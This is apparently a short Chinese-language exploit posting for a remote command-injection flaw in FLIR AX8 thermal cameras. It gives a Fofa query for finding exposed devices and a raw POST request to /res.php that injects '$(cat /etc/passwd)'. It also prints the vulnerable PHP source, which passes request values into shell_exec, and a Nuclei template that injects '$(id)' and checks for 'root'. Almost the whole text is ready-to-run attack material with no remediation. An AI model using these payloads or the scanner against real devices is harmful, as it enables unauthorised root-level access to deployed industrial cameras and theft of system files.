FLIR-AX8存在RCE漏洞

# Fofa搜索app="FLIR-FLIR-AX8"

POST /res.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 39
action=node&resource=$(cat /etc/passwd)

<?php  if (isset($_POST["action"])) {  switch ($_POST["action"]) {  case "get":  if(isset($_POST["resource"]))  {  switch ($_POST["resource"]) {  case ".rtp.hflip":  if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {  $result = "false";  break;  }  $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";break;case ".rtp.vflip":  if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {  $result = "false";  break;}$result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";break;default:$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));}}break;case "set":  if(isset($_POST["resource"]) and isset($_POST["value"])) {  switch ($_POST["resource"]) {    case "rtp.hflip":    file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");    break;    case "rtp.vflip":    file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");    break;    default:    $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;  }}
break;case "measurement":  if (isset($_POST["type"]) && isset($_POST["id"])) {  $nodeData =  trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"]));  $lines = explode("n", $nodeData);  foreach($lines as $line)    {      $resource = preg_split('/s+/', $line);      $value = trim($resource[1], """);      $result[$resource[0]] = $value;    }}break;case "global-parameters":  $nodeData =  trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));$lines = explode("n", $nodeData);foreach($lines as $line)  {    $resource = preg_split('/s+/', $line);    $result[$resource[0]] = $resource[1];  }case "alarm":  if(isset($_POST["id"])){  $nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"]));  $lines = explode("n", $nodeData);  foreach($lines as $line)    {      $resource = preg_split('/s+/', $line);      $value = trim($resource[1], """);      $result[$resource[0]] = $value;    }}break;case "calibrate":        $result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");
        break;      case "node":        $nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"]));        $result = preg_split("/s+n/", $nodes);        break;    }    echo json_encode($result);  }?>

id: flir-ax8rce
info:  name: flir-ax8rce  author: Ph9ar  severity: high  description: flir-ax8rce  reference:    - https://4pts.online  tags: rce
requests:  - raw:      - |-        POST /res.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Connection: close        Upgrade-Insecure-Requests: 1        Content-Type: application/x-www-form-urlencoded        Content-Length: 26
        action=node&resource=$(id)
    matchers-condition: and    matchers:      - type: word        part: body        words:          - root      - type: status        status:          - 200